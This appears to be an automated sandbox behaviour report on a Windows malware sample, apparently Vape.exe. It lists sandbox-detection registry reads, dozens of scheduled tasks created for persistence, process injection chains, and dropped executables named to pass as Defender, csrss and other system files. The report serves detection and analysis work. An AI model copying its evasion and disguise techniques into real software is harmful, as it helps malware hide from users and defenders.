Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 43 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
3688	schtasks.exe
3808	schtasks.exe
1584	schtasks.exe
4132	schtasks.exe
1760	schtasks.exe
1688	schtasks.exe
1784	schtasks.exe
68	schtasks.exe
4320	schtasks.exe
532	schtasks.exe
4904	schtasks.exe
2584	schtasks.exe
3324	schtasks.exe
652	schtasks.exe
4796	schtasks.exe
4436	schtasks.exe
1924	schtasks.exe
4384	schtasks.exe
4780	schtasks.exe
4956	schtasks.exe
1692	schtasks.exe
3532	schtasks.exe
3492	schtasks.exe
4212	schtasks.exe
1592	schtasks.exe
4272	schtasks.exe
2324	schtasks.exe
1700	schtasks.exe
1336	schtasks.exe
1492	schtasks.exe
196	schtasks.exe
4904	schtasks.exe
2144	schtasks.exe
4428	schtasks.exe
2664	schtasks.exe
968	schtasks.exe
2088	schtasks.exe
2288	schtasks.exe
428	schtasks.exe
2284	schtasks.exe
2572	schtasks.exe
828	schtasks.exe
1240	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6612 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4568 tasklist.exe
4956 tasklist.exe

pid	process
6612	timeout.exe

pid	process
4568	tasklist.exe
4956	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exedialer.exeOfficeClickToRun.exesvchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 2 IoCs

Processes:

Microsoft_Protection.exeIntoref.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	Microsoft_Protection.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	Intoref.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeMicrosoft_crypt.exepowershell.exedialer.exelhhsgwktkatl.exepowershell.exeIntoref.exewmiprvse.exe

pid	process
2204	powershell.exe
2204	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
2476	powershell.exe
2476	powershell.exe
2204	powershell.exe
2476	powershell.exe
1012	powershell.exe
2476	powershell.exe
2204	powershell.exe
4680	Microsoft_crypt.exe
3344	powershell.exe
3344	powershell.exe
3344	powershell.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
2932	dialer.exe
2932	dialer.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
4680	Microsoft_crypt.exe
2932	dialer.exe
2932	dialer.exe
1208	lhhsgwktkatl.exe
2932	dialer.exe
2932	dialer.exe
392	powershell.exe
392	powershell.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
392	powershell.exe
392	powershell.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
4996	Intoref.exe
4996	Intoref.exe
4996	Intoref.exe
4996	Intoref.exe
392	powershell.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
4996	Intoref.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
2932	dialer.exe
3060	wmiprvse.exe
2932	dialer.exe
2932	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

csrss.exe

pid process

4756 csrss.exe

pid	process
4756	csrss.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Msvchost.exetasklist.exetasklist.exeWMIC.exeWMIC.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3456	Msvchost.exe
Token: SeDebugPrivilege	4956	tasklist.exe
Token: SeDebugPrivilege	4568	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe
Token: SeLoadDriverPrivilege	4620	WMIC.exe
Token: SeSystemProfilePrivilege	4620	WMIC.exe
Token: SeSystemtimePrivilege	4620	WMIC.exe
Token: SeProfSingleProcessPrivilege	4620	WMIC.exe
Token: SeIncBasePriorityPrivilege	4620	WMIC.exe
Token: SeCreatePagefilePrivilege	4620	WMIC.exe
Token: SeBackupPrivilege	4620	WMIC.exe
Token: SeRestorePrivilege	4620	WMIC.exe
Token: SeShutdownPrivilege	4620	WMIC.exe
Token: SeDebugPrivilege	4620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4620	WMIC.exe
Token: SeRemoteShutdownPrivilege	4620	WMIC.exe
Token: SeUndockPrivilege	4620	WMIC.exe
Token: SeManageVolumePrivilege	4620	WMIC.exe
Token: 33	4620	WMIC.exe
Token: 34	4620	WMIC.exe
Token: 35	4620	WMIC.exe
Token: 36	4620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe
Token: SeManageVolumePrivilege	4324	WMIC.exe
Token: 33	4324	WMIC.exe
Token: 34	4324	WMIC.exe
Token: 35	4324	WMIC.exe
Token: 36	4324	WMIC.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe
Token: SeLoadDriverPrivilege	4620	WMIC.exe
Token: SeSystemProfilePrivilege	4620	WMIC.exe
Token: SeSystemtimePrivilege	4620	WMIC.exe
Token: SeProfSingleProcessPrivilege	4620	WMIC.exe
Token: SeIncBasePriorityPrivilege	4620	WMIC.exe
Token: SeCreatePagefilePrivilege	4620	WMIC.exe
Token: SeBackupPrivilege	4620	WMIC.exe
Token: SeRestorePrivilege	4620	WMIC.exe
Token: SeShutdownPrivilege	4620	WMIC.exe
Token: SeDebugPrivilege	4620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4620	WMIC.exe
Token: SeRemoteShutdownPrivilege	4620	WMIC.exe
Token: SeUndockPrivilege	4620	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Vape.exeMicrosoft_R.exeMicrosoft_Protection.exeMicrosoft_M.exeMicrosoft_R.exeMicrosoft_M.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeMsvchost.exeMicrosoft_crypt.execmd.exe

description	pid	process	target process
PID 824 wrote to memory of 660	824	Vape.exe	Microsoft_Protection.exe
PID 824 wrote to memory of 660	824	Vape.exe	Microsoft_Protection.exe
PID 824 wrote to memory of 660	824	Vape.exe	Microsoft_Protection.exe
PID 824 wrote to memory of 4680	824	Vape.exe	Conhost.exe
PID 824 wrote to memory of 4680	824	Vape.exe	Conhost.exe
PID 824 wrote to memory of 5088	824	Vape.exe	Microsoft_R.exe
PID 824 wrote to memory of 5088	824	Vape.exe	Microsoft_R.exe
PID 5088 wrote to memory of 4660	5088	Microsoft_R.exe	Microsoft_R.exe
PID 5088 wrote to memory of 4660	5088	Microsoft_R.exe	Microsoft_R.exe
PID 660 wrote to memory of 640	660	Microsoft_Protection.exe	powercfg.exe
PID 660 wrote to memory of 640	660	Microsoft_Protection.exe	powercfg.exe
PID 660 wrote to memory of 640	660	Microsoft_Protection.exe	powercfg.exe
PID 824 wrote to memory of 4752	824	Vape.exe	Microsoft_M.exe
PID 824 wrote to memory of 4752	824	Vape.exe	Microsoft_M.exe
PID 824 wrote to memory of 3456	824	Vape.exe	Msvchost.exe
PID 824 wrote to memory of 3456	824	Vape.exe	Msvchost.exe
PID 4752 wrote to memory of 4856	4752	Microsoft_M.exe	Microsoft_M.exe
PID 4752 wrote to memory of 4856	4752	Microsoft_M.exe	Microsoft_M.exe
PID 4660 wrote to memory of 392	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 392	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 4216	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 4216	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 3192	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 3192	4660	Microsoft_R.exe	cmd.exe
PID 4856 wrote to memory of 1688	4856	Microsoft_M.exe	schtasks.exe
PID 4856 wrote to memory of 1688	4856	Microsoft_M.exe	schtasks.exe
PID 4856 wrote to memory of 1444	4856	Microsoft_M.exe	cmd.exe
PID 4856 wrote to memory of 1444	4856	Microsoft_M.exe	cmd.exe
PID 4660 wrote to memory of 3576	4660	Microsoft_R.exe	cmd.exe
PID 4660 wrote to memory of 3576	4660	Microsoft_R.exe	cmd.exe
PID 4856 wrote to memory of 888	4856	Microsoft_M.exe	cmd.exe
PID 4856 wrote to memory of 888	4856	Microsoft_M.exe	cmd.exe
PID 4856 wrote to memory of 2588	4856	Microsoft_M.exe	powercfg.exe
PID 4856 wrote to memory of 2588	4856	Microsoft_M.exe	powercfg.exe
PID 392 wrote to memory of 1012	392	cmd.exe	powershell.exe
PID 392 wrote to memory of 1012	392	cmd.exe	powershell.exe
PID 4216 wrote to memory of 2204	4216	cmd.exe	powershell.exe
PID 4216 wrote to memory of 2204	4216	cmd.exe	powershell.exe
PID 888 wrote to memory of 4956	888	cmd.exe	schtasks.exe
PID 888 wrote to memory of 4956	888	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 4620	3576	cmd.exe	WMIC.exe
PID 3576 wrote to memory of 4620	3576	cmd.exe	WMIC.exe
PID 3192 wrote to memory of 4568	3192	cmd.exe	tasklist.exe
PID 3192 wrote to memory of 4568	3192	cmd.exe	tasklist.exe
PID 1444 wrote to memory of 2476	1444	cmd.exe	powershell.exe
PID 1444 wrote to memory of 2476	1444	cmd.exe	powershell.exe
PID 2588 wrote to memory of 4324	2588	cmd.exe	WMIC.exe
PID 2588 wrote to memory of 4324	2588	cmd.exe	WMIC.exe
PID 1688 wrote to memory of 1896	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1896	1688	cmd.exe	powershell.exe
PID 1444 wrote to memory of 492	1444	cmd.exe	MpCmdRun.exe
PID 1444 wrote to memory of 492	1444	cmd.exe	MpCmdRun.exe
PID 4216 wrote to memory of 4296	4216	cmd.exe	MpCmdRun.exe
PID 4216 wrote to memory of 4296	4216	cmd.exe	MpCmdRun.exe
PID 3456 wrote to memory of 2284	3456	Msvchost.exe	schtasks.exe
PID 3456 wrote to memory of 2284	3456	Msvchost.exe	schtasks.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 4680 wrote to memory of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 1960 wrote to memory of 604	1960	cmd.exe	wusa.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:592

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1016

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:64

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1100

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3040

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:1768

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:4448

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:1068

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:708

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:5660

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:5740

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:5828

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:5796

C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe
"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"
2⤵
- Executes dropped EXE
PID:5908

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
- Executes dropped EXE
PID:6248

C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe
"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"
2⤵
- Executes dropped EXE
PID:6336

C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"
2⤵
- Executes dropped EXE
- Launches sc.exe
PID:6456

C:\Users\Default User\dllhost.exe
"C:\Users\Default User\dllhost.exe"
2⤵
- Executes dropped EXE
PID:7132

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:6296

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:3612

